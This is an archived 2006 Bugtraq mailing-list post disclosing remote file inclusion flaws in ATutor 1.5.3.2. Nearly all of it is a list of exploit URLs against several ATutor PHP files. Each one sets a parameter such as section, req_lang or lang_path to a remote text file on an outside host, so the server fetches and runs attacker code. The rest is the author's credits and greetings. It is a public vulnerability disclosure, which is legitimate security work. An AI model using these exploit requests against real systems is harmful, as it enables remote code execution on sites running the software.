lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20061019185321.26351.qmail@securityfocus.com>
Date: 19 Oct 2006 18:53:21 -0000
From: subzero.0000@...mail.com
To: bugtraq@...urityfocus.com
Subject: ATutor 1.5.3.2=> Remote File Include Vulnerability

#====================================================================== 
# Atutor 
#====================================================================== 
# Info:- 
# Download: http://prdownloads.sourceforge.net/atutor/ATutor-1.5.3.2.tar.gz?download
# Version :  ATutor 1.5.3.2 
#====================================================================== 
#                                                 "programmatic Error"
#
##########################################################################################################
# require(dirname(__FILE__).'/../'.$section.'/pages.inc.php');
# Exploit: www.site.com/ATutor/documentation/common/frame_toc.php?section=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
# #########################################################################################################
# require('../'.$section.'/pages.inc.php');
# Expolit:www.site.com/ATutor/documentation/common/print.php?section=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
##########################################################################################################
# require('../'.$section.'/pages.inc.php');
# Expolit:www.site.com/ATutor/documentation/common/search.php?section=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
##########################################################################################################
# require('../'.$section.'/'.$req_lang.'/pages.inc.php');
# Expolit:www.site.com/ATutor/documentation/common/search.php?req_lang=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
###########################################################################################################
# require(dirname(__FILE__) . '/'.$req_lang.'/text.php');
# Expolit:www.site.com/ATutor/documentation/common/vitals.inc.php?req_lang=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
###########################################################################################################
# require(AT_MODULE_PATH . $row['dir_name'].'/module.php');
# Expolit:www.site.com/ATutor/include/classes/module/module.class.php?row[dir_name]=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
#####################################################################################################################
# include($lang_path.'phpmailer.lang-en.php');
#www.site.com/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
######################################################################################################################
#====================================================================== 
#Discoverd By : SuBzErO
# 
#Conatact : subzero.0000[at]hotmail.com  or subzer0.0000[at]hotmail.com
#TEAM SuBzErO 
#Greetz to : FATAL ERROR - fucker_net - mohandko - rootshell - hitler jeddah - ThE-WoLf-KsA - v1per-haCker                       
#and all members in lezr
#thanx to str0ke :) 
#WWW.XP10.COM
#WWW.LEZR.COM

=======================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ